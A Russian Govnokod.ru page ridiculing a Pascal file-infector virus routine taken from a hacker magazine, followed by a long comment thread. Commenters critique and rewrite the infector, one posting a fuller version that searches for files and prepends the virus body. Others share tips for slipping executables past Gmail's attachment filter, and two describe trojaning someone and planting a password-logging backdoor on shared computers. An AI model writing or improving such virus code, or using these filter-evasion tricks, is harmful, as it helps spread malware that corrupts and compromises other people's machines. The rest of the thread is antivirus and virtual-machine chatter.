1. Pascal / Говнокод #15557

    +89

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    procedure infect(victim:string);
    var
    a:integer;
    
    Buf: array[1..virsize] of byte;
    nr,nw:longint;
    begin
    try
    randomize;
    assignfile(f1,victim);
    a:=random(200);
    rename(f1,'bad'+inttostr(a)) ;
    filemode :=0;
    assignfile(f2,paramstr(0));
    reset(f2,1) ;
    seek(f2,0);
    blockread(f2,buf,virsize);
    filemode:=2 ;
    closefile(f2);
    assignfile(f1,victim);
    rewrite(f1,1);
    blockwrite(f1,buf,virsize);
    assignfile(f2,'bad'+inttostr(a));
    reset(f2,1);
    seek(f2,0);
    repeat
    BlockRead(f2, Buf,virsize, NR);
    BlockWrite(f1, Buf, NR, NW);
    until (NR = 0) or (NW <> NR);
    closefile(f1);
    closefile(f2);
    deletefile(pchar('bad'+inttostr(a)))
    except
    end;
    end;

    Ксакеп, нуфф сказал.
    http://www.xakep.ru/post/23374/

    Запостил: gost, 23 Марта 2014

    Комментарии (118) RSS

    • Пиздец. Просто пиздец. Набивают такой пургой мозг школьникам, потом из них вырастают моральные уроды.


      repeat
      BlockRead(f2, Buf,virsize, NR);
      BlockWrite(f1, Buf, NR, NW);
      until (NR = 0) or (NW <> NR);


      за такое надо руки отрывать.
      Ответить
      • Красиво же. Сразу и внезапное переполнение диска и внезапное исчезание файла обрабатываем. Я надеюсь что {$I-}
        Ответить
      • За что минусы, товарищи?
        Я хотел сказать, что нужно выделить 2 блока (1 равный размеру тела, 2 равный размеру жертвы) прочитать себя (уж точно не с помощью BlockRead!!), затем прочитать блок из жертвы. Затем установить файловый указатель на 0, записать себя в жертву, установить файловый указатель на размер тела и записать блок жертвы. Вот и все. То, что автор использует array вместо выделения памяти, многократно открывает/закрывает жертву, пишет в цикле (вкупе с траеблядством) говорит о его безмозглости, так как в этом случае вирус легко может испортить жертву, что может быть расценено как вредоносный функционал и повлечет для автора куда большие проблемы.
        Ответить
        • а вдруг жертва весит 40Гб!
          Ответить
          • заражать имеет смысл файлы от 30 до 300 кб, в крайнем случае - 1мб. Нужно ставить проверку на размер жертвы.
            Ответить
            • Кто сказал что 2Мб нельзя заражать? Да скоро и программ то меньше мегабайта уже не останется, их будут сразу трояном считать.
              >То, что автор использует array вместо выделения памяти, многократно открывает/закрывает жертву, пишет в цикле (вкупе с траеблядством) говорит о его безмозглости
              Если открыть статью по ссылке, то там каждое второе слово вызывает фейспалм, но указание именно этих трех пунктов вызывает сомнение в мозглости Stertora.
              Ответить
              • > Да скоро и программ то меньше мегабайта уже не останется, их будут сразу трояном считать.

                Блядская авира именно так и делает с екзешниками размером меньше 100 кб. Видимо эти тупые быдлокодеры считают, что каждый, кто сумел уложить программу в такой размер - охренеть какой кулхацкер!
                Ответить
                • кулхацкеры тоже адаптируются. В интернетах ходит история про троянского слона весом 200 метров
                  Ответить
                  • Скоро блядская авира будет ловить только нормальные прогреммы.
                    Ответить
                  • 300, если точнее. Упакован с помощью темиды - это обфускатор, который таскает с собой свою виртуалку.
                    Ответить
                • Все правильно делает, не зря это один из лучших антивирусов. Кстати, если авира находит файл зараженный вышеуказанным способом(файл с *.exe заголовком в оверлее exe), она определяет его как троян. То, что лечить не умеет - это да, а если комп с авирой заразится, то только сносить систему.
                  Ответить
                  • > Все правильно делает, не зря это один из лучших антивирусов.

                    Бля пиздец, я минуснул, и я хочу зайти со всех виртуалов и минуснуть, и ещё заминусовать всех, кто плюсует эту хуйню.
                    Кто блять назвал это дерьмо лучшим?
                    Вы знаете, сколько у меня проблем из-за этого дерьма? "Тарас, какой-то высер каких-то дебилов считает твою новую игру вирусом, ПОСОНЫ НЕ КАЧАЙТЕ", меня заебало блять каждый раз объяснять, что у меня вируса нет, вирус есть только в ДНК разработчиков Авиры, ЗАЕБАЛО!!!!
                    Ответить
                    • Вот когда авира на гуглплей пробьется, там тоже твои игры вирусней считать будут.
                      Ответить
                    • да-да, клепаешь втихушку трояны, старый лжец
                      Ответить
                    • Втули текстурки получше, добей размер до мегабайта.
                      Ответить
                    • > ЗАЕБАЛО!!!!
                      Просто. Удали. Ее.
                      Ответить
                    • У Авиры в настройках можно ставить галочки, какие типы угроз ты хочешь определять. И в этом списке есть пункт... Игры.

                      Ага, злобные буратины ставят подряд все галочки, а потом жалуются, что Авира игры сносит.
                      Ответить
                      • > Игры
                        Все правильно, они угрожают свободному времени... Надо тоже авиру поставить.
                        Ответить
                        • Если бы она все удаляла, а то она большую часть пропускает...
                          Ответить
                          • Вы правы.
                            Нужно удалять все программы, вешая на них ярлык "потенциально опасная программа", а те, что нельзя удалить(процессы операционки) держать в сохраненном дампе.
                            Ответить
                    • О да, конечно. Не стесняйся!..
                      Ответить
              • Ты погоди с выводами, не лезь вперед батьки в пекло.

                А нельзя потому, что на распаковывание файла из оверлея и его запуск расходуется время, и это будет особенно заметно на слабых машинах( увеличение паузы перед запуском). Во-вторых, вирусу нужно как-то распространяться; в ходу всегда файлы небольшого размера, их таскают на флешках, передают с компа на комп, грузят на торренты. Глупо заражать инсталляционные пакеты и тп. громоздкости. Это нахуй никому не нужно.

                Опус номер два. В коде этого недодумка есть 1 try на почти на весь код, который вдобавок никак не обрабатывается. (Возникла ошибка? Да похуй, идем дальше. Не удалось закрыть открытый файл? Нонсенс, продолжаем.)
                Ну словит он исключение на этот трай, и что дальше? Запорол полтораста бинарников, заразил два?
                Ответить
                • >в ходу всегда файлы небольшого размера, их таскают на флешках, передают с компа на комп, грузят на торренты.
                  Грузят на торренты файлы в 300кб? таскают их на флешках? Я слышал что с торрентов качают, а на флешках носят как раз инсталляционные пакеты, если уж говорить об ехе-файлах. Можно конечно сделать вирус заражающий только кейгены, но это как-то не по-какерски.

                  > В коде этого недодумка есть 1 try на почти на весь код, который вдобавок никак не обрабатывается.
                  Ну так насчет этого он сам написал - игнорим ошибки. И все правильно же, большинство ошибок будет попытками записать в файл "только для чтения".
                  А что, интересно, должен делать вирус если возникла ошибка - аварийно завершиться? записать информацию в лог? Процедура при возникновении исключения завершится, т.е. продолжать "портить" файл она и не будет. Честно говоря не вижу отличий от твоего кода ниже, разве что у тебя ошибки ловятся только в момент открытия, а у него - все. И да, {$I-} ты видимо не осилил.
                  Ответить
                  • Может ты и прав. Я не вирмейкер.
                    >>И да, {$I-} ты видимо не осилил.
                    Мне это нах не нужно. Я принципиально не пользуюсь обертками.
                    Ответить
                  • >>Можно конечно сделать вирус заражающий только кейгены
                    Откуда уверенность что в креках и кейгенах по дефолту не интегрировано никакого зловредного кода?
                    Любители проприетарного софта на халяву тоже должны платить.
                    Ответить
                    • Интегрировано конечно, поэтому вирус заражающих их и не нужен.
                      Ответить
                      • Интегрируют вендоры взламываемого софта, чтобы юзерам неповадно было скачивать кейгены.
                        К примеру, аваст (и еще несколько ав, под которые есть кейгены) определяет свои кейгены как трояны, под страшными именами, вроде "win32:zlob" (к слову, один из самых опасных троянов), на поверку же оказывается, что это не более, чем хитрый умысел авторов антивируса. Кашпер вообще кейгены не палит, потому, что их и нет под него - нет смысла извираться.
                        Ответить
                        • Кейгены есть только у долбоёбов. Ваш кэп.
                          Ответить
                          • Я так не думаю.
                            Ответить
                            • А я так думаю. Потому, что если юзать асимметричную криптографию - знание алгоритма не поможет тебе получить секретный ключ.
                              Ответить
                              • Ну вон у the bat была ассиметричная криптография, и где она? :) Крякеры тупо поменяли паблик ключ в экзешке на свой, вот и вся криптография.

                                P.S. А, ну да, туплю, это уже не чистый кейген.
                                P.P.S. Есть еще полумифическая область - white box криптография. Кто-нибудь читал работы по ней?
                                Ответить
                                • А обычная это какой бокс? Там и так все секретное - это ключи и иногда выхлоп ГСЧ.
                                  Ответить
                                  • > А обычная это какой бокс?
                                    Обычная криптография совсем не предназначена для работы во враждебной среде. Иначе или ключ подменят на свой, или тупо отдебажат и спиздят. Т.е. DRM на чистой криптографии у тебя не получится.

                                    А вот white box (по заверениям авторов) как раз для боевых условий. Из той лапши, которая там генерится и ключ хер выдернешь (даже симметричный), и хрен подменишь его своим.
                                    Ответить
                    • Х.з. Поэтому кейгены как-то безопасней, чем кряки, их почти всегда можно запускать на виртуалке...
                      Ответить
                      • Вообще-то что угодно почти всегда можно запускать на виртуалке.
                        Ответить
                        • Патчер, который что-то пишет в файлы проги - не запустишь. По крайней мере, отучить от жадности прогу на компе через виртуалку не получится.
                          Ответить
                          • Не надо спешить с выводами, дорогой товарищ.
                            Программа состоит из исполняемого файла (само приложение) и дополнительных файлов. Нужно установить взламываемую программу на хостовый комп и на систему в виртуалке. Затем запустить патч на виртуалке и скопировать уже обработанное приложение в его рабочую папку на хостовую систему.
                            Ответить
                            • И кто гарантирует, что пропатченные файлы будут безвредны?
                              Ответить
                              • Шаганэ.

                                "Шаганэ ты моя, Шаганэ!
                                Потому, что я с севера, что ли,
                                Я готов рассказать тебе поле,
                                Про волнистую рожь при луне.
                                Шаганэ ты моя, Шаганэ."
                                (С. Есенин)

                                Ответить
                          • Но если прога нормально работает на виртуалке - то можно ее там и оставить. Так даже безопасней.
                            Ответить
                            • Может, сразу в виртуалке и остаться? И получим те же самые проблемы плюс худшая производительность.
                              Ответить
                              • > худшая производительность
                                Ну если там видео не конвертировать и не играться в современные игры - сойдет. Особой разницы в производительности нет.

                                > те же самые проблемы
                                Ну не совсем те же самые... Всегда можно откатить снепшот если что-то нехорошее случится. Ну и если там не держать важные файлы и пароли - то и спиздить нечего.

                                Короче для запуска недоверенного софта со всяких форумов и файлопомоек - само то.
                                Ответить
                                • P.S. Ну и плюс для тестирования очень удобно держать снимок с девственно чистой виндой.
                                  Ответить
                                  • >с девственно чистой
                                    для регулярной дефлорации
                                    Ответить
                                • P.P.S. Ну и довольно удобно для деления на зоны, данные и софт из которых не хотелось бы смешивать - одна виртуалка для работы (в ней ничего лишнего помимо средств разработки, и можно пригласить коллегу на тимвьювер), вторая для проверки всякой херни (на ней можно даже поставить skymonk, mediaget, всякие тулбары и прочую парашу, которой не место на нормальном компе), третья для порнухи, и так далее.

                                  В принципе, у нормальной машины памяти и ядер вполне хватает, чтобы гонять 2-3 таких виртуалки одновременно.
                                  Ответить
                                  • >Ну и довольно удобно для деления на зоны
                                    Это есть, но если сделать из виртуалки одну большую зону - получишь то же самое, что и на реальном компе.
                                    Ответить
                                    • > если сделать из виртуалки одну большую зону - получишь то же самое, что и на реальном компе
                                      Ну это да, согласен.
                                      Ответить
                                  • Гоняли виртуалку с автокадом на ноуте с 6 ГБ оперативы и 2 ядреным AMD через локалку
                                    Ответить
                                • >Ну если там видео не конвертировать и не играться в современные игры - сойдет.
                                  Игори - не проблема. Я недавно настроил vga passthrough и гонял скурим в виртуалке
                                  Ответить
                                  • > Я недавно настроил vga passthrough
                                    А на какой виртуалке?
                                    Ответить
                                    • kvm. Если интересно могу подробно расписать
                                      Ответить
                                      • > kvm
                                        А там при vga passthrough поди придется две видюхи юзать? Одну для виртуалки, вторую для хоста?
                                        Ответить
                                        • >А там при vga passthrough поди придется две видюхи юзать?
                                          Да. У меня на хосте недовидия, на госте - радеон. Nvidia Quadro вроде можно разделить между гостями
                                          Ответить
                                          • > У меня на хосте недовидия, на госте - радеон.
                                            Понятно... А интеграшка из проца не прокатит в качестве хостовой?

                                            Кстати, как у этой схемы с безопасностью? Вредоносный код из виртуалки же будет иметь полный доступ к видюхе. А pci-e устройства, в свою очередь, вроде как имеют доступ к оперативе. Не позволит ли это какому-нибудь эксплойту овладеть хостом?
                                            Ответить
                                            • >Понятно... А интеграшка из проца не прокатит в качестве хостовой?
                                              По идее покатит. Но есть проблема, связанная с захватом устроиств на хосте. Для nvidia-drivers был патч. Как дела обстоят с интелом(?) не знаю.

                                              >Кстати, как у этой схемы с безопасностью? Вредоносный код из виртуалки же будет иметь полный доступ к видюхе. А pci-e устройства, в свою очередь, вроде как имеют доступ к оперативе. Не позволит ли это коду из виртуалки овладеть хостом?

                                              IOMMU по идее не должен давать такой доступ. Да и вирусописателям проще поиметь кучу хомячков, чем возиться с багами kvm. Я не особо задумывался о безопасности, т.к. в виртуалка мне нужна только для игорей, а перезагружаться лень. То есть у меня виртуалка - это относительно доверенная среда.

                                              Кстати, далеко не все материнки с iommu могут в проброс. Тут тоже надо гуглить истории успеха

                                              https://www.linux.org.ru/wiki/en/User:Lindows
                                              https://bbs.archlinux.org/viewtopic.php?id=162768
                                              Ответить
                                              • > Тут тоже надо гуглить истории успеха
                                                Мой проц не умеет в vt-d, да и дискретная видюха - нвидия. Так что придется и дальше жить с дуалбутом для игрушек :(
                                                Ответить
                                          • И несколько моников подключать тоже надо будет?
                                            Ответить
                                            • > И несколько моников подключать тоже надо будет?
                                              Ну да. Ну или KVM цеплять. Или моник с двумя входами, у соседа такой стоит с переключением DVI/VGA кнопкой на морде.

                                              А от двух моников я бы не отказался, это же удобно ;) Просто сейчас стол маловат, не войдет второй моник.
                                              Ответить
                                        • Некоторые ставили xen и отдавали гостям видухи. Я тоже хотел так сделать, но блядская нвидиа не работает в виртуалках, а проприетарщина от amd на линуксе - полный ахтунг.
                                          Ответить
                                  • Я гонял варик в вмваре еще в 2010 кажется, но тормозит же.
                                    Ответить
                                    • > Я гонял варик в вмваре еще в 2010 кажется, но тормозит же.
                                      Ну виртуальную видюху и vga passthrough сравнивать все-таки нечестно. С пробросом видюхи игры должны летать как-будто винда на реальном железе стоит ;)

                                      P.S. Прошел первую мафию в виртуалбоксе, фпс стабильный, лагов и фризов не было.
                                      Ответить
                                      • Тормозит значит тормозит по сравнению с настоящей осью. Ты бы еще дум вспомнил.
                                        Ответить
        • > многократно открывает/закрывает жертву
          что?
          Ответить
          • см. код.
            файл нужно открыть только 1 раз: чтобы сначала считать, а потом вписать в него инфу.
            Другими словами, CreateFile в режиме Generic_Write/File_Share_Write.
            Ответить
            • можно еще так:
              procedure infect();
              var
                f,ff:file of byte;
                ibuff,nbuff:pointer;
                size,nsize:integer;
                fname:string;
                list:tstringlist;
                i:integer;
              begin
                assignfile(f,paramstr(0));
                filemode:=fmopenread;
                reset(f);
                size:=vsize; // размер берется из константы
                ibuff:=allocmem(size);
                blockread(f,ibuff,size);
                closefile(f);
              
                list:=tstringlist.Create; // ищем подходящие файлы
                findfiles(list);
                
                for i:=0 to list.Count -1 do
                begin
                  fname:=list[i];
                  if comparetext(fname,paramstr(0))=0 then continue;
                  assignfile(ff,fname);
                  filemode:=fmopenread;
              	try
              		reset(ff);
              	except
              		continue;
              	end;
              	
                  if <проверка на зараженность>=true // уже заражен
                  begin
                    closefile(ff);
                    continue;
                  end;
              	
                  seek(ff,0);
                  nsize:=filesize(ff);
                  nbuff:=allocmem(nsize);
                  blockread(ff,nbuff,nsize);
                  filemode:=fmopenwrite;
                  try
                    reset(ff);
                  except
                    continue;
              	  freemem(nbuff^);
                  end;
                  seek(ff,0);
                  blockwrite(ff,ibuff,size);
                  seek(ff,size);
              	
                  blockwrite(ff,nbuff,nsize);
                  closefile(ff);
                  freemem(nbuff);
                end;
              end;


              код писан на коленке, прошу сильно не пинать. Также код содержит намеренные ошибки, чтобы не смущать школоло на грех окаянный.

              вирусы такого типа(т.е. писаные ололо) не сохраняют при заражении иконку (к своему стыду, признаю, я тоже не умею это делать), а это большой порок.
              Ответить
            • Покажи место, где ты видишь многократное открытие файла?
              Ответить
              • procedure infect(victim:string);
                var
                a:integer;
                
                Buf: array[1..virsize] of byte;
                nr,nw:longint;
                begin
                try
                randomize;
                assignfile(f1,victim);
                a:=random(200);
                rename(f1,'bad'+inttostr(a)) ;
                filemode :=0;
                assignfile(f2,paramstr(0));
                reset(f2,1) ;
                seek(f2,0);
                blockread(f2,buf,virsize);
                filemode:=2 ;
                closefile(f2);
                assignfile(f1,victim);
                rewrite(f1,1);
                blockwrite(f1,buf,virsize);
                assignfile(f2,'bad'+inttostr(a));
                reset(f2,1);
                seek(f2,0);
                repeat
                BlockRead(f2, Buf,virsize, NR);
                BlockWrite(f1, Buf, NR, NW);
                until (NR = 0) or (NW <> NR);
                closefile(f1);
                closefile(f2);
                deletefile(pchar('bad'+inttostr(a)))
                except
                end;
                end;
                Ответить
    • показать все, что скрытоvanished
      Ответить
      • Тебя опять выгнал твой очередной парень? Наверно, плохо сосешь.
        Ответить
      • Из-за тебя пришлось провести ковровую бомбардировку плюсами :(
        Ответить
        • Когда в топике хорошая атмосфера, это чувствуется сразу, несмотря на минусы, поставленные чей-то волосатой, шкодливой рукой с длинными пальцами.
          p/s/
          Я плюсанул твой пост.
          Ответить
    • >09.08.2004
      Блядь, я не пойму, что за прикол такой - жить в стазисе? Это как нацисты в "Железном небе", все еще верящие в силу своего одоробла-компьютера, когда уже есть смартфоны мощнее их. Нет, я бы еще понял, если бы человек когда-то это выучил и теперь пользовался по инерции, потому что ему и так хватает (вот я пользуюсь cmd - мне оно нужно в основном для подстановки параметров программам, мне хватает), но учить этот пиздец заново вместо чего-то поактуальнее? Двач, кто эти люди, добровольно инвестирующие силы в свою профнепригодность?
      Ответить
    • Ну и раз уже речь за антивирусы пошла - у нас эникей в инсте поставил дефолтовое поведение sophos antivirus-a удалять файлы. Про ложную тревогу слышали? Ну вот, грохнуло лоадер к игре, который не понравился софосу пакером, когда я копировал файло со своей флешки на свой же жесткий диск. Слава богу, у меня был админский пароль (а он элементарно добывается с помошью live cd) и я просто завершил сервис этого уебища. Разговор с админом ничего не дал, после чего я окончательно понял, что он там не для того, чтобы помогать студентам.
      Ответить
      • Институтка? ;)
        Команда "format c:\" изменит мир.
        Ответить
        • Что, простите?
          Ответить
          • С таким мурлом не о чем говорить. Попытайся заставить его отработать свою зарплату. А удаленные файлы легко восстановить - антивирус не затирает кластеры. Посмотри recuva -> piriform.com
            Ответить
            • format c: на компах? Дык лечится раскатыванием образа. А говорить таки не о чем.

              Можно было, но он удалил один файл, который я мог восстановить, после чего я застремался и отрубил антивирь. Я просто так и не понял - хуле не поставить антивирь на блокирование? Зачем удалять?

              Кстати, раз ставилось все раскатыванием образа, то и пароль был одинаковый. Я развлекался через pstools, грохая отдельные проги или explorer с потомками через pskill. Как то даже ухитрился поставить бекдор, пишущий в лог пароли логина шинды.
              Ответить
              • Пущай поработает, восстановит.
                Обычно такие "товарищи" очень упертые, считают себя умнее всех, хотя на деле-ламо масдайное, даже горячие клавиши не все знают.
                Ответить
                • > Пущай поработает, восстановит.
                  Дык это в худшем случае воткнуть флешку\диск и нажать пару-тройку кнопок. Восстановление с образа дело нехитрое.
                  Ответить
                  • а если это делать рекурсивно? система ставится самое меньшее, час-час с половиной.
                    http://www.cheatengine.org/forum/files/itrollu_172.gif
                    Ответить
                    • > а если это делать рекурсивно?
                      Всмысле? Поясни идею.

                      > ставится
                      Да нихуя там никто ставить не будет... Втыкаешь флешку, жмешь в интерфейсе того же акрониса "раскатать образ", и уходишь на полчасика курить/пить чай/играться. Через полчаса комп девственно чист и никаких вирей на нем не осталось (ну не в биос же ты ему их прошиваешь? ;). Вот и вся работа.
                      Ответить
                      • сносить систему регулярно.
                        Ответить
                        • Найдут и набьют ебало пожалуются ректору ;)

                          Административные меры всегда были надежней, чем технические.
                          Ответить
                          • Толсто.
                            Ответить
                            • Да нет, в самый раз. Меня гоняли к канцлеру за то, что сбросил админский пасс и поставил на комп емулю, ибо дома инет был куцый. Еще и мое файло на моем аккаунте прошерстили.
                              Ответить
      • В одной конторе касперский так отжигал со входящей почтой. Кидаю другу запароленный архив на мыло. Он говорит - ты мне пустой файл прислал. Ну ок, кидаю еще раз. Опять файл пустой. Поматерились, начали разбираться. Оказалось, что админ настроил касперского так, что он удалял все, что не может распаковать и проверить...
        Ответить
        • На gmail.com именно так.
          Запрещено отсылать запароленные архивы, исполняемые и еще некоторые типы файлов.

          Я заметил, что сервер пытается парсить текст письма (!) , подставляя полученные токены в качестве пароля к архиву. Он делает это с целью расшифровать запароленный архив, чтобы посмотреть, какие файлы он содержит. В частности, архив, содержащий вот такую приписку:
          archive.rar
          привет, посылаю тебе архив. пароль - 99472

          будет распакован и проверен.
          Ответить
          • >будет распакован и проверен.
            а если зашифровать имена файлов? Походу он не распаковывает, а просто проверяет по имени файла, если находит exe-подобный внутри архива, то просто не пускает. Не обязательно даже распаковывать.
            Ответить
            • Ну, к примеру, winRar позволяет создать зашифрованный архив со скрытием имен файлов - нельзя даже посмотреть, что там, не распаковав.
              Ответить
              • так вот я и говорю, если в архиве имена скрыть, он всё равно найдет там экзешник, если пароль в теле письма указать?
                Ответить
                • думаю, да.
                  Ответить
                  • а вот хуй
                    Ответить
                    • это проверенный факт, или просто домысел?
                      Ответить
                      • пока имена не шифровал, гуглопочта не пущала запароленный рар-архив с exe-шкой внутри.
                        Пароль в теле письма был указан.
                        Ответить
                        • Хм. надо будет попробвать. Некоторое время назад не получалось отправить, сервер писал, что недопустимо отправлять файлы такого типа.
                          Ответить
                          • Но зачем, если для обмана gmail достаточно переименовать архив?
                            Ответить
                            • Ну, я особо с этим не разбирался, просто как-то пытался троянить одного уебка, и столкнулся вот с этим.
                              Ответить
                              • Провел тест, результат - на моем ящике Gmail не открывает архивы.
                                Посылались:
                                1. Исполняемый файл в открытую (не вирус).
                                2. Он же, запакованный в рар без пароля.
                                3. Он же, запакованный в рар с паролем 75545, без шифрования названий файлов (нет, в учетку на ГК пытаться входить не надо).
                                4. Он же, запакованный в рар с паролем 76657, без шифрования названий файлов, пароль указан в тексте письма.
                                5. Он же, запакованный в рар с паролем 79925, с шифрованием названий файлов, пароль в тексте не указан.

                                http://prntscr.com/340vla

                                При отправке ругнулся на .exe, остальные пришли:
                                http://prntscr.com/340vs6
                                Ответить
          • Переименовываешь archive.rar в archive.rar1 и никаких паролей не надо, всю жизнь так ехе файлы через gmail отправляю.
            Ответить
          • А вот archive.tgz.die_stupid_google и archive.zip.fuck_off вполне отправляются ;)

            Правда тут уже недостаток - на другой стороне их надо переименовывать.
            Ответить
            • Все лучше чем с паролями мучаться.
              Ответить
              • Ну пароли все-таки немного для другого ставят - если не хочется чтобы на данном канале передачи кто-то мог прочитать письмо (google, mail.ru, местный админ etc.)
                Ответить
                • >Ну пароли все-таки немного для другого ставят
                  это если их не указывать в теле письма конечно :)
                  Ответить
          • >Запрещено отсылать запароленные архивы, исполняемые и еще некоторые типы файлов.
            Серьезно? Нахуй этот гмейл.
            Ответить
            • >>
              gost 3 часа назад # 0
              Провел тест, результат - на моем ящике Gmail не открывает архивы.
              Посылались:
              1. Исполняемый файл в открытую (не вирус).
              2. Он же, запакованный в рар без пароля.
              3. Он же, запакованный в рар с паролем 75545, без шифрования названий файлов (нет, в учетку на ГК пытаться входить не надо).
              4. Он же, запакованный в рар с паролем 76657, без шифрования названий файлов, пароль указан в тексте письма.
              5. Он же, запакованный в рар с паролем 79925, с шифрованием названий файлов, пароль в тексте не указан.

              http://prntscr.com/340vla

              При отправке ругнулся на .exe, остальные пришли:
              http://prntscr.com/340vs6
              <<
              Ответить
        • Молча удалял? В жопу такого админа.
          Ответить

    Добавить комментарий